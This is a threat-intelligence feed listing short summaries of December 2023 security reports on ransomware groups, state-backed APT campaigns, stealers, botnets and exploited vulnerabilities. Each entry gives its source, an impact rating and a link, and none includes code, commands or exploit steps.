Cyberint
Intel Name:
Anonymous_Sudan_expansion
Date of Scan:
2023-12-19
Impact:
LOW
Summary:
In December 2023 Cyberint detected that Anonymous Sudan claimed responsibility for disrupting the Discord login page in collaboration with SKYNET and GodzillaBotnet. This action stands among a series of recent collaborative attacks the groups executed.
Source: https://cyberint.com/blog/research/anonymous-sudan-an-analysis/
2023-12-19
Malware_Trends_Tracker
LOW
+
Intel Source:
Any.Run
Intel Name:
Malware_Trends_Tracker
Date of Scan:
2023-12-19
Impact:
LOW
Summary:
"Every day Any.Run researchers upload a lot of submissions to the ANY.RUN sandbox, many of them with malicious verdicts. That’s why researchers created the Malware Trends Tracker. Each malware description provides the malware's history, recent samples, distribution method, execution video, detection process, global, weekly, and monthly ranks, and IOCs: the latest IP addresses, hashes, domain names, and URLs."
Source: https://any.run/cybersecurity-blog/malware-statistics-and-trends/
2023-12-19
The_Play_ransomware_group
MEDIUM
+
Intel Source:
CISA
Intel Name:
The_Play_ransomware_group
Date of Scan:
2023-12-19
Impact:
MEDIUM
Summary:
The FBI, CISA, and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) released a joint Cybersecurity Advisory (CSA), #StopRansomware: Play Ransomware, to disseminate Play ransomware group’s tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data, and have impacted a wide range of businesses and critical infrastructure organizations in North America, South America, Europe, and Australia.
Source: https://www.cisa.gov/news-events/alerts/2023/12/18/fbi-cisa-and-asds-acsc-release-advisory-play-ransomware
2023-12-19
Cybercriminals_abuse_GitHub_tool_Predator
LOW
+
Intel Source:
Trellix
Intel Name:
Cybercriminals_abuse_GitHub_tool_Predator
Date of Scan:
2023-12-19
Impact:
LOW
Summary:
Trellix showed in their blog how cybercriminals have abused the GitHub tool Predator and how it has been used in multiple phishing campaigns with frequently changing URL patterns in a very short span. Predator, a tool designed to combat bots and web crawlers, can distinguish web requests originating from automated systems, bots, or web crawlers.
Source: https://www.trellix.com/about/newsroom/stories/research/cybercrooks-leveraging-anti-automation-toolkit-for-phishing-campaigns/
2023-12-18
The_Sidewinder_group_cyber_intrusion_tactics
LOW
+
Intel Source:
Cyfirma
Intel Name:
The_Sidewinder_group_cyber_intrusion_tactics
Date of Scan:
2023-12-18
Impact:
LOW
Summary:
Cyfirma published a report describing a recent threat actor campaign using a malicious Word document with an embedded macro, unraveling a sophisticated cyber threat orchestrated by the Sidewinder group, possibly to target Nepalese government officials. The threat started with a likely spear-phishing email delivering a malicious Word document. Once the document is downloaded and opened, the victim is manipulated into enabling macros, upon which the embedded macro executes.
Source: https://www.cyfirma.com/outofband/from-macro-to-payload-decrypting-the-sidewinder-cyber-intrusion-tactics/
2023-12-18
Early_Detection_of_Malicious_Stockpiled_Domains
LOW
+
Intel Source:
PaloAlto
Intel Name:
Early_Detection_of_Malicious_Stockpiled_Domains
Date of Scan:
2023-12-18
Impact:
LOW
Summary:
Palo Alto analysts described how the techniques used by cybercriminals have evolved into domain wars.
Source: https://unit42.paloaltonetworks.com/detecting-malicious-stockpiled-domains/
2023-12-18
Kimsuky_threat_group_is_targeting_research_institutes_in_South_Korea
LOW
+
Intel Source:
Rewterz
Intel Name:
Kimsuky_threat_group_is_targeting_research_institutes_in_South_Korea
Date of Scan:
2023-12-18
Impact:
LOW
Summary:
The North Korean state-backed threat group known as Kimsuky is targeting research institutes in South Korea with spear-phishing to infect the target systems with backdoor trojans and ultimately execute commands for stealing sensitive data.
Source: https://f1tym1.com/2023/12/18/rewterz-threat-alert-kimsuky-apt-uses-backdoor-attacks-on-south-korean-research-institutes-active-iocs/
2023-12-18
Xorbot_Botnet_Family
LOW
+
Intel Source:
Nsfocus
Intel Name:
Xorbot_Botnet_Family
Date of Scan:
2023-12-18
Impact:
LOW
Summary:
The NSFOCUS Global Threat system observed an ELF file being widely spread, accompanied by a large amount of suspected encrypted outbound communication traffic, yet the detection engine did not flag it. After further deep analysis, it was identified as a novel, deeply hidden botnet family. Given that the family uses multiple rounds of XOR operations in its encryption and decryption algorithms, NSFOCUS Research Labs named the Trojan xorbot.
Source: https://nsfocusglobal.com/xorbot-a-stealthy-botnet-family-that-defies-detection/
2023-12-18
Unveiling_a_Year_of_Covert_Operations_Profiling_a_Stealthy_Threat_Actor
LOW
+
Intel Source:
Thedfirreport
Intel Name:
Unveiling_a_Year_of_Covert_Operations_Profiling_a_Stealthy_Threat_Actor
Date of Scan:
2023-12-18
Impact:
LOW
Summary:
This report provides a unique analysis by exploring data from the perspective of a threat actor's exposed host. Discovered in an open directory, the amassed data spans over a year, unveiling a historical narrative of the threat actor's operations. While primarily non-financially motivated, the actor strategically targeted an array of sectors, including government, defense contractors, finance, critical infrastructure, telecommunications, and escort services. Operating exclusively with open-source tools, the threat actor demonstrated a diverse skill set, employing active scanning, reconnaissance, and targeted exploits.
Source: https://thedfirreport.com/2023/12/18/lets-opendir-some-presents-an-analysis-of-a-persistent-actors-activity/
2023-12-18
Pig_Butchering_Scams_Deep_Dive_into_Cryptocurrency_Confidence_Schemes
LOW
+
Intel Source:
Sophos
Intel Name:
Pig_Butchering_Scams_Deep_Dive_into_Cryptocurrency_Confidence_Schemes
Date of Scan:
2023-12-18
Impact:
LOW
Summary:
Cryptocurrency-based crime, particularly "pig butchering" scams, has evolved into sophisticated confidence schemes. Perpetrators use dating apps to establish relationships, leveraging generative AI to craft convincing messages. Investigating these scams reveals a complex web of interconnected domains and contract wallets, with scams evolving to avoid detection. The study unveils a multimillion-dollar network, emphasizing the need for public awareness and vigilance against the maturing tactics employed by organized crime rings in the cryptocurrency space.
Source: https://news.sophos.com/en-us/2023/12/18/luring-with-love-defi-mining-scam-indepth/
2023-12-18
BATLOADER_2_X_Threat_of_Stealthy_Malware_Tactics
LOW
+
Intel Source:
Seqrite
Intel Name:
BATLOADER_2_X_Threat_of_Stealthy_Malware_Tactics
Date of Scan:
2023-12-18
Impact:
LOW
Summary:
Seqrite analysts analyzed an attack where Batloader loads the payload, and it is a stealer this time. Batloader is not a new malware in the series – it is an emerging one.
Source: https://www.seqrite.com/blog/decoding-batloader-2-x-unmasking-the-threat-of-stealthy-malware-tactics/
2023-12-18
Unearthing_a_Scripted_Assault_on_RocketMQ
LOW
+
Intel Source:
SANS
Intel Name:
Unearthing_a_Scripted_Assault_on_RocketMQ
Date of Scan:
2023-12-18
Impact:
LOW
Summary:
Delving into the aftermath of the CVE-2023-33246 vulnerability in RocketMQ, this report spotlights a malicious Bash script discovered in the wild. Operating surreptitiously, the script dynamically creates an environment, installs dependencies, and leverages the masscan port scanner to identify vulnerable servers. Specifically targeting open ports associated with RocketMQ, the script then employs a Python counterpart for the actual exploitation.
Source: https://isc.sans.edu/diary/rss/30492
2023-12-15
The_Lazarus_Group_Releases_KandyKorn
MEDIUM
+
Intel Source:
Infoblox
Intel Name:
The_Lazarus_Group_Releases_KandyKorn
Date of Scan:
2023-12-15
Impact:
MEDIUM
Summary:
KandyKorn is a highly sophisticated and dangerously formidable remote access trojan (RAT). Lazarus Group’s use of the KandyKorn malware tool highlights the group’s continued build-out of sophisticated tools and the growing dangers of their cyberattacks. Infoblox shared in their blog that threat actors have refined their techniques, causing most of the potential damage before malicious domains are identified and shared through open-source intelligence (OSINT) and the majority of commercial threat intel feeds.
Source: https://blogs.infoblox.com/cyber-threat-intelligence/dns-for-early-detection-lazarus-kandykorn/
2023-12-15
Honeypot_Recon_for_MySQL_Malware_Infection
LOW
+
Intel Source:
Trustwave
Intel Name:
Honeypot_Recon_for_MySQL_Malware_Infection
Date of Scan:
2023-12-15
Impact:
LOW
Summary:
Trustwave took a closer look at the infection mechanisms of malware recently observed on MySQL servers, which leverages SQL commands to infiltrate stealthily and to deploy and activate malicious payloads, and at how these threats are constantly evolving, changing behavior, and adjusting their infection techniques.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/
2023-12-15
The_BianLian_White_Rabbit_and_Mario_ransomware_gangs_collaboration
MEDIUM
+
Intel Source:
Resecurity
Intel Name:
The_BianLian_White_Rabbit_and_Mario_ransomware_gangs_collaboration
Date of Scan:
2023-12-15
Impact:
MEDIUM
Summary:
A ransomware attack on a financial services firm in the APAC region used tactics such as password spraying, BEC emails, and compromised third-party accounts. Evidence suggests the attack was conducted by a trinity of ransomware gangs, White Rabbit, Mario, and Ransomhouse, who threatened to report the victim to regulators if they failed to pay the ransom. The attack further highlights the vulnerability of VPNs to ransomware attackers.
Source: https://www.resecurity.com/blog/article/Exposing-Cyber-Extortion-Trinity-BianLian-White-Rabbit-Mario-Ransomware-Gangs-Spotted-Joint-Campaign
2023-12-15
PikaBot_distributed_via_malicious_search_ads
LOW
+
Intel Source:
Malwarebytes
Intel Name:
PikaBot_distributed_via_malicious_search_ads
Date of Scan:
2023-12-15
Impact:
LOW
Summary:
Recently, researchers have noticed PikaBot, a new malware family that first showed up at the beginning of 2023, distributed via malvertising. PikaBot was previously only distributed via malspam campaigns similar to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads
2023-12-14
RHADAMANTHYS_V_0_5_0
LOW
+
Intel Source:
Checkpoint
Intel Name:
RHADAMANTHYS_V_0_5_0
Date of Scan:
2023-12-14
Impact:
LOW
Summary:
Check Point Research team provided in their analysis a detailed view of agent modules, presenting their capabilities and implementation, focusing on how the stealer components are loaded and how they work. Rhadamanthys is an information stealer with a diverse set of modules and an interesting multilayered design.
Source: https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/
2023-12-14
OilRig_persistent_attacks
MEDIUM
+
Intel Source:
Welivesecurity
Intel Name:
OilRig_persistent_attacks
Date of Scan:
2023-12-14
Impact:
MEDIUM
Summary:
Researchers from Welivesecurity have analyzed a growing series of downloaders used by the OilRig cyber espionage group to maintain access to Israeli targets of special interest, in their blogpost published on 14 December 2023.
Source: https://www.welivesecurity.com/en/eset-research/oilrig-persistent-attacks-cloud-service-powered-downloaders/
2023-12-14
NKAbuse_a_new_multiplatform_threat
LOW
+
Intel Source:
Securelist
Intel Name:
NKAbuse_a_new_multiplatform_threat
Date of Scan:
2023-12-14
Impact:
LOW
Summary:
Securelist discovered a new multiplatform threat, “NKAbuse”. The malware uses NKN technology for data exchange and backdoor capabilities. Their analysis suggests that the main target of NKAbuse is Linux desktops, but it can also infect MIPS and ARM systems and could pose a threat to IoT devices.
Source: https://securelist.com/unveiling-nkabuse/111512/
2023-12-14
GambleForce_campaign_carries_SQL_injection_attacks
LOW
+
Intel Source:
Group-IB
Intel Name:
GambleForce_campaign_carries_SQL_injection_attacks
Date of Scan:
2023-12-14
Impact:
LOW
Summary:
Group-IB’s Threat Intelligence team has observed since September 2023 that the GambleForce threat actor has targeted more than 20 websites (government, gambling, retail, and travel) in Australia, China, Indonesia, the Philippines, India, South Korea, Thailand, and Brazil. After analyzing the toolset in more detail, the analysts concluded that the tools were most likely associated with a threat actor executing one of the oldest attack methods: SQL injection.
Source: https://www.group-ib.com/blog/gambleforce-gang/
2023-12-14
Recent_Gaza_Cybergang_activities
MEDIUM
+
Intel Source:
Sentinelone
Intel Name:
Recent_Gaza_Cybergang_activities
Date of Scan:
2023-12-14
Impact:
MEDIUM
Summary:
SentinelLabs’ analysis reinforces the suspected ties between Gaza Cybergang and WIRTE, historically considered a distinct cluster with loose relations to the Gaza Cybergang.
Source: https://www.sentinelone.com/labs/gaza-cybergang-unified-front-targeting-hamas-opposition/
2023-12-14
KV_Botnet_Investigation
LOW
+
Intel Source:
Lumen
Intel Name:
KV_Botnet_Investigation
Date of Scan:
2023-12-14
Impact:
LOW
Summary:
The Black Lotus Labs team at Lumen Technologies is tracking a small office/home office (SOHO) router botnet that forms a covert data transfer network for advanced threat actors. They called this KV-botnet. The campaign infects devices at the edge of networks, a segment that has emerged as a soft spot in the defensive array of many enterprises.
Source: https://blog.lumen.com/routers-roasting-on-an-open-firewall-the-kv-botnet-investigation/
2023-12-14
The_discovered_cluster_of_malicious_Python_projects
LOW
+
Intel Source:
Welivesecurity
Intel Name:
The_discovered_cluster_of_malicious_Python_projects
Date of Scan:
2023-12-14
Impact:
LOW
Summary:
ESET Research discovered 116 malicious packages in PyPI, the official repository of software for the Python programming language, uploaded in 53 projects. The malware delivers a backdoor capable of remote command execution, exfiltration, and taking screenshots. The backdoor component is implemented for both Windows, in Python, and Linux, in Go.
Source: https://www.welivesecurity.com/en/eset-research/pernicious-potpourri-python-packages-pypi/
2023-12-13
Unraveling_Cerber_Ransomware
MEDIUM
+
Intel Source:
Seqrite
Intel Name:
Unraveling_Cerber_Ransomware
Date of Scan:
2023-12-13
Impact:
MEDIUM
Summary:
This analysis delves into the intricacies of Cerber ransomware, a malicious software identified in 2016. Cerber employs advanced techniques, such as custom-packing its payload, using mutex validation to prevent reinfection, and configuring Windows firewall rules for evading security tools. The ransomware communicates through a specific protocol, employs RSA and RC4 algorithms for encryption, and employs a self-deletion mechanism post-infection. To safeguard against Cerber and similar threats, the analysis recommends precautionary measures, including regular data backups, software updates, strong password usage, and vigilant email practices.
Source: https://www.seqrite.com/blog/cerber-ransomware-exposed-a-comprehensive-analysis-of-advanced-tactics-encryption-and-evasion/
2023-12-13
FakeSG_RAT_Campaign_Akira_Ransomware_and_AMOS_Stealer_Insights
MEDIUM
+
Intel Source:
Securelist
Intel Name:
FakeSG_RAT_Campaign_Akira_Ransomware_and_AMOS_Stealer_Insights
Date of Scan:
2023-12-13
Impact:
MEDIUM
Summary:
Explore the dynamic landscape of crimeware through a detailed examination of three distinct threats: the FakeSG campaign utilizing NetSupport RAT, the Akira ransomware affecting both Windows and Linux environments, and the AMOS stealer targeting macOS users. Delve into the FakeSG campaign's deceptive browser update tactics, Akira's sophisticated ransomware techniques resembling Conti, and the AMOS stealer's evolution from Go to C language.
Source: https://securelist.com/crimeware-report-fakesg-akira-amos/111483/
2023-12-13
Exploitation_of_JetBrains_TeamCity_CVE_Globally
MEDIUM
+
Intel Source:
CISA
Intel Name:
Exploitation_of_JetBrains_TeamCity_CVE_Globally
Date of Scan:
2023-12-13
Impact:
MEDIUM
Summary:
The FBI, U.S. CISA, U.S. NSA, Polish Military Counterintelligence Service, CERT Polska (CERT.PL), and the UK’s NCSC concluded that Russian cyber actors APT 29 (aka the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard) have been exploiting JetBrains TeamCity software via CVE-2023-42793 at large scale, targeting servers hosting TeamCity over the last couple of months.
Source: https://www.cisa.gov/sites/default/files/2023-12/aa23-347a-russian-foreign-intelligence-service-svr-exploiting-jetbrains-teamcity-cve-globally.pdf
2023-12-13
An_increase_of_malicious_ads_on_Google_searches_for_Zoom
LOW
+
Intel Source:
Malwarebytes
Intel Name:
An_increase_of_malicious_ads_on_Google_searches_for_Zoom
Date of Scan:
2023-12-13
Impact:
LOW
Summary:
This month, Malwarebytes researchers noticed a spike of malicious ads on Google searches for “Zoom”, the video conferencing software. Threat actors have been switching between different keywords for software downloads, such as “Advanced IP Scanner” or “WinSCP”, normally geared toward IT administrators. The researchers shared the details of two cases: first, a new loader called HiroshimaNukes that they had not seen mentioned publicly before, and second, a campaign dropping the FakeBat loader in which the threat actor tracked victims via a panel that was new to them, called Hunting panel 1.40.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/12/malvertisers-zoom-in-on-cryptocurrencies-and-initial-access
2023-12-13
Mallox_Resurrected
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
Mallox_Resurrected
Date of Scan:
2023-12-13
Impact:
MEDIUM
Summary:
SentinelOne analysts shared their summary and report of recent Mallox activity, explained the group’s initial access methods, and provided a high-level analysis of recent Mallox payloads. To date, this group continues to steal and leak a steady stream of enterprise data.
Source: https://www.sentinelone.com/blog/mallox-resurrected-ransomware-attacks-exploiting-ms-sql-continue-to-burden-enterprises/
2023-12-13
Kuiper_ransomware_analysis
LOW
+
Intel Source:
Stairwell
Intel Name:
Kuiper_ransomware_analysis
Date of Scan:
2023-12-13
Impact:
LOW
Summary:
At the beginning of this month, Stairwell researchers obtained a copy of a server suspected of being operated by the developers of the Kuiper ransomware. Their report gives an overview of the Stairwell researchers' findings and a technical analysis of the ransomware.
Source: https://stairwell.com/resources/kuiper-ransomware-analysis-stairwells-technical-report/
2023-12-12
TA4557_Targets_Recruiters_Directly_via_Email
LOW
+
Intel Source:
Proofpoint
Intel Name:
TA4557_Targets_Recruiters_Directly_via_Email
Date of Scan:
2023-12-12
Impact:
LOW
Summary:
Recently, Proofpoint observed an attack from the TA4557 campaign which used both the new method in which the actor emails recruiters directly and the older technique of applying to jobs posted on job boards to start the attack chain. Specifically, in the attack chain that uses the direct email technique, once the recipient responds to the initial email, the actor is observed responding with a URL linking to an actor-controlled website posing as a candidate's resume.
Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta4557-targets-recruiters-directly-email?
2023-12-12
A_series_of_related_attacks_against_organizations_with_new_tool_set
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
A_series_of_related_attacks_against_organizations_with_new_tool_set
Date of Scan:
2023-12-12
Impact:
MEDIUM
Summary:
Unit 42 researchers observed a series of apparently related attacks against organizations in the Middle East, Africa and the U.S. Unit 42 is sharing these results with the purpose of helping organizations defend against the tools observed here.
Source: https://unit42.paloaltonetworks.com/new-toolset-targets-middle-east-africa-usa/
2023-12-12
The_delivery_of_the_ITG05_campaign_exclusive_Headlace_backdoor
MEDIUM
+
Intel Source:
X-Force
Intel Name:
The_delivery_of_the_ITG05_campaign_exclusive_Headlace_backdoor
Date of Scan:
2023-12-12
Impact:
MEDIUM
Summary:
X-Force observed ITG05, likely a Russian state-sponsored group, using lures related to the ongoing Israel-Hamas war to assist the delivery of a custom backdoor called HeadLace. "This new campaign is against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance, and diplomatic centers," security researchers Golo Mühr, Claire Zaboeva, and Joe Fasulo said.
Source: https://securityintelligence.com/x-force/itg05-ops-leverage-israel-hamas-conflict-lures-to-deliver-headlace-malware/
2023-12-12
APT37_also_known_as_ScarCruft_or_Red_Eyes_activity
MEDIUM
+
Intel Source:
Rewterz
Intel Name:
APT37_also_known_as_ScarCruft_or_Red_Eyes_activity
Date of Scan:
2023-12-12
Impact:
MEDIUM
Summary:
APT37, aka ScarCruft or Red Eyes, is a state-sponsored cyber espionage group originating from North Korea. The group has been active for more than 10 years and previously targeted victims in South Korea. This time it started attacks against entities in other countries, including Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and various parts of the Middle East. Among the threats APT37 has been associated with are Goldbackdoor and RokRAT.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-apt37-aka-scarcruft-or-redeyes-active-iocs-2/
2023-12-12
The_updated_GULOADER_analysis
LOW
+
Intel Source:
Elastic
Intel Name:
The_updated_GULOADER_analysis
Date of Scan:
2023-12-12
Impact:
LOW
Summary:
Elastic Security Labs researchers continue to monitor active threats like GULOADER, aka CloudEyE, a very tricky shellcode downloader that has been highly active for years while under constant development. One of its recent changes is the addition of exceptions to its Vectored Exception Handler (VEH) in a fresh campaign.
Source: https://www.elastic.co/security-labs/getting-gooey-with-guloader-downloader
2023-12-11
Malicious_Backdoor_Disguised_as_Data_Leak_Material_in_Targeted_Campaign
LOW
+
Intel Source:
ASEC
Intel Name:
Malicious_Backdoor_Disguised_as_Data_Leak_Material_in_Targeted_Campaign
Date of Scan:
2023-12-11
Impact:
LOW
Summary:
AhnLab Security Emergency Response Center (ASEC) has identified a targeted campaign distributing a malicious executable file disguised as personal data leak material. The malware functions as a backdoor, receiving obfuscated commands in XML format from threat actors. Although the final behavior could not be observed due to the closure of the command and control (C2) server, the malware involves the creation of obfuscated files, including legitimate doc files, to deceive users. The threat actor employs various scripts, such as Operator.jse and WindowsHotfixUpdate.ps1, creating a complex execution chain.
Source: https://asec.ahnlab.com/en/59763/
2023-12-11
New_Editbot_Stealer_Spreads
LOW
+
Intel Source:
Cyble
Intel Name:
New_Editbot_Stealer_Spreads
Date of Scan:
2023-12-11
Impact:
LOW
Summary:
Cyble researchers observed a WinRAR archive file on VirusTotal with minimal detection. Their analysis indicated that it is part of a new campaign targeted at social media users. This campaign involves a multi-stage attack, where each phase has a particular role, such as evading detection, downloading additional payloads, or gaining persistence on the victim’s system.
Source: https://cyble.com/blog/new-editbot-stealer-spreads-via-social-media-messages/
2023-12-11
New_Linux_Remote_Access_Trojan
LOW
+
Intel Source:
Group-IB
Intel Name:
New_Linux_Remote_Access_Trojan
Date of Scan:
2023-12-11
Impact:
LOW
Summary:
The Group-IB Threat Intelligence unit shared their insights on the Linux Remote Access Trojan (RAT) Krasue. This RAT has been used against organizations in Thailand. Krasue poses a severe risk to critical systems and sensitive data, as it could grant attackers remote access to the targeted network. The malware also features rootkits embedded in the binary. Group-IB researchers confirmed that Krasue was used against telecommunications companies, although it has likely been leveraged in attacks against organizations in other verticals. The Group-IB team shared Krasue’s key characteristics, its functionalities, its potential impact, and the measures that organizations should take to defend against this evolving threat.
Source: https://www.group-ib.com/blog/krasue-rat/
2023-12-11
Mustang_Panda_s_PlugX_new_variant_attacks
LOW
+
Intel Source:
Lab52
Intel Name:
Mustang_Panda_s_PlugX_new_variant_attacks
Date of Scan:
2023-12-11
Impact:
LOW
Summary:
The Lab52 team analyzed a campaign in which attackers deployed a new variant of the PlugX malware. The details and the various artifacts used showed that it has a lot of similarities with the SmugX campaign, attributed to the threat actors Red Delta and Mustang Panda, allegedly linked to the Chinese government. The analysts observed that these attacks are targeted against the Taiwanese government and diplomats.
Source: https://lab52.io/blog/mustang-pandas-plugx-new-variant-targetting-taiwanese-government-and-diplomats/
2023-12-11
Sandman_APT
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
Sandman_APT
Date of Scan:
2023-12-11
Impact:
MEDIUM
Summary:
SentinelLabs, Microsoft, and PwC threat intelligence researchers shared the joint report with the information on the Sandman APT cluster. They saw links between Sandman and a suspected China-based threat actor using the shared KEYPLUG backdoor – STORM-0866/Red Dev 40. Their report included victimology overlaps, cohabitation, and sharing C2 infrastructure control and management practices.
Source: https://www.sentinelone.com/labs/sandman-apt-china-based-adversaries-embrace-lua/
2023-12-11
Operation_Blacksmith
MEDIUM
+
Intel Source:
Talos
Intel Name:
Operation_Blacksmith
Date of Scan:
2023-12-11
Impact:
MEDIUM
Summary:
This month, Cisco Talos researchers discovered a new campaign, “Operation Blacksmith”, conducted by the Lazarus Group using three new DLang-based malware families, two of which are remote access trojans (RATs). The campaign uses Telegram bots and channels as a medium for command and control (C2) communications. Researchers track the Telegram-based RAT as “NineRAT”, the non-Telegram-based RAT as “DLRAT”, and the DLang-based downloader as “BottomLoader”.
Source: https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/
2023-12-11
Unraveling_the_Complex_AsyncRAT_Infection_Chai
MEDIUM
+
Intel Source:
Trendmicro
Intel Name:
Unraveling_the_Complex_AsyncRAT_Infection_Chai
Date of Scan:
2023-12-11
Impact:
MEDIUM
Summary:
Trend Micro's Managed XDR (MxDR) team has conducted an in-depth analysis of the AsyncRAT (Remote Access Tool) infection chain, revealing the tool's sophisticated capabilities, including keylogging and remote desktop control. The blog post explores the misuse of the legitimate Microsoft process aspnet_compiler.exe by malicious actors, shedding light on evolving adversary tactics. The investigation details the entire timeline of events, from the initial download to the establishment of command-and-control connections. The analysis highlights AsyncRAT's adaptability across diverse attack vectors, including phishing campaigns and ransomware infections.
Source: https://www.trendmicro.com/en_us/research/23/l/analyzing-asyncrat-code-injection-into-aspnetcompiler-exe.html
2023-12-09
The_evolution_of_the_ATMZOW_skimmer
LOW
+
Intel Source:
Sucuri
Intel Name:
The_evolution_of_the_ATMZOW_skimmer
Date of Scan:
2023-12-09
Impact:
LOW
Summary:
The Sucuri research team shared their deep look into recent Google Tag Manager containers used in e-commerce malware, examined some newer forms of obfuscation techniques used in the malicious code, and tracked the evolution of the ATMZOW skimmer linked to widespread Magento website infections since 2015.
Source: https://blog.sucuri.net/2023/12/40-new-domains-of-magecart-veteran-atmzow-found-in-google-tag-manager.html
2023-12-09
Exploitation_of_Qlik_Sense_servers
LOW
+
Intel Source:
Esentire
Intel Name:
Exploitation_of_Qlik_Sense_servers
Date of Scan:
2023-12-09
Impact:
LOW
Summary:
eSentire has seen multiple instances of threat actors exploiting vulnerabilities in Qlik Sense to gain initial access into victim organizations. Qlik Sense is a data analytics platform; there is a high probability that unpatched, internet-facing Qlik Sense servers will be targeted in an ongoing campaign.
Source: https://www.esentire.com/security-advisories/qlik-sense-exploitation
2023-12-09
DanaBot_trojan_deploying_IcedID
LOW
+
Intel Source:
Esentire
Intel Name:
DanaBot_trojan_deploying_IcedID
Date of Scan:
2023-12-09
Impact:
LOW
Summary:
Last month, eSentire Threat Response analysts again observed DanaBot, a banking Trojan renowned for stealing banking credentials and personal information and for its hVNC capability. This malware was being employed to deliver IcedID, another banking Trojan.
Source: https://www.esentire.com/blog/danabots-latest-move-deploying-icedid
2023-12-09
Israel_Hamas_vs_Ukraine_Russia_cyber_war
MEDIUM
+
Intel Source:
Cyberint
Intel Name:
Israel_Hamas_vs_Ukraine_Russia_cyber_war
Date of Scan:
2023-12-09
Impact:
MEDIUM
Summary:
The conflict that began in Israel on the morning of October 7 between Israel and Hamas has not only been fought on physical battlegrounds but has also drawn multiple threat actors into cyberspace, as has the Russian-Ukrainian conflict. Cyberint shared their deep analysis of cases from these two different wars.
Source: https://cyberint.com/blog/research/israel-hamas-vs-ukraine-russia-war/
2023-12-09
The_exploits_for_Citrix_Bleed_are_in_the_wild
HIGH
+
Intel Source:
Esentire
Intel Name:
The_exploits_for_Citrix_Bleed_are_in_the_wild
Date of Scan:
2023-12-09
Impact:
HIGH
Summary:
Two months ago, the eSentire team received alerts which, after investigation, were tied to a LockBit ransomware attack. The first indicators included Rclone activity and connections to the known malicious C2 domain megapackup[.]com. The eSentire Threat Response Unit continued its investigation of this malicious activity and concluded with confidence that the threat actor gained initial access via the Citrix Bleed vulnerability (CVE-2023-4966) affecting Citrix NetScaler ADC and NetScaler Gateway, which allows attackers to bypass authentication by retrieving session tokens. Exploits for Citrix Bleed are available in the wild, and the vulnerability is being actively discussed on Russian hacking forums.
Source: https://www.esentire.com/blog/citrix-bleed-vulnerability-a-gateway-to-lockbit-ransomware
2023-12-09
MrAnon_Stealer_Spreads_via_Email
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
MrAnon_Stealer_Spreads_via_Email
Date of Scan:
2023-12-09
Impact:
MEDIUM
Summary:
This month, FortiGuard Labs discovered an email phishing campaign using misleading booking information to lure victims into clicking on a malicious PDF file. These malicious PDF downloads run a PowerShell script to deliver the MrAnon Stealer malware. This malware is a Python-based information stealer packed with cx-Freeze to evade detection. MrAnon Stealer steals its victims' credentials, system information, browser sessions, and cryptocurrency extensions.
Source: https://www.fortinet.com/blog/threat-research/mranon-stealer-spreads-via-email-with-fake-hotel-booking-pdf
2023-12-09
Fighting_Ursa_two_malicious_campaigns
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
Fighting_Ursa_two_malicious_campaigns
Date of Scan:
2023-12-09
Impact:
MEDIUM
Summary:
Unit 42 researchers have observed the group Fighting Ursa (APT28) exploiting the Microsoft Outlook vulnerability CVE-2023-23397, initially as a zero-day, over the past 20 months to target at least 30 organizations within 14 nations that are of likely strategic intelligence value to the Russian government and its military. The group conducted at least two campaigns using this vulnerability that have been made public.
Source: https://unit42.paloaltonetworks.com/russian-apt-fighting-ursa-exploits-cve-2023-233397/
2023-12-09
Malware_creation_by_Kimsuky_Group_using_AutoIt
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Malware_creation_by_Kimsuky_Group_using_AutoIt
Date of Scan:
2023-12-09
Impact:
MEDIUM
Summary:
ASEC is constantly following the Kimsuky group’s attacks using LNK-type malware and studying their attack cases. The Kimsuky group installs remote control malware to control the infected system to gain initial access. Kimsuky's malware also includes open-source or commercial malware such as XRat, HVNC, Amadey, and Metasploit Meterpreter. This time ASEC analyzed Amadey and RftRAT which were recently found being distributed.
Source: https://asec.ahnlab.com/en/59590/
2023-12-08
Merry_Phishmas_phishing_activities
LOW
+
Intel Source:
Domaintools
Intel Name:
Merry_Phishmas_phishing_activities
Date of Scan:
2023-12-08
Impact:
LOW
Summary:
During the holidays, DomainTools is warning the public to stay extremely careful against the threat of USPS package redelivery phishing attacks. DomainTools is monitoring several USPS phishing campaigns, which include activity that aligns with the known tactics, techniques, and procedures of the China-based “Chenlun” phishing actor and their affiliated groups.
Source: https://www.domaintools.com/resources/blog/merry-phishmas-beware-us-postal-service-phishing-during-the-holidays/
2023-12-07
Star_Blizzard_increases_sophistication_and_evasion_in_ongoing_attacks
HIGH
+
Intel Source:
CISA, Microsoft
Intel Name:
Star_Blizzard_increases_sophistication_and_evasion_in_ongoing_attacks
Date of Scan:
2023-12-07
Impact:
HIGH
Summary:
CISA, the UK NCSC, the Australian Signals Directorate’s Australian Cyber Security Centre, the Canadian Centre for Cyber Security, the New Zealand National Cyber Security Centre, and the U.S. NSA, FBI, and Cyber Command Cyber National Mission Force (CNMF) shared their security warning “Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns”. This threat actor, formerly known as SEABORGIUM and also tracked as Callisto Group/TA446/COLDRIVER/TAG-53/BlueCharlie, continues to use spear-phishing campaigns against targeted organizations and individuals in the UK and other geographical areas of interest for information-gathering activity.
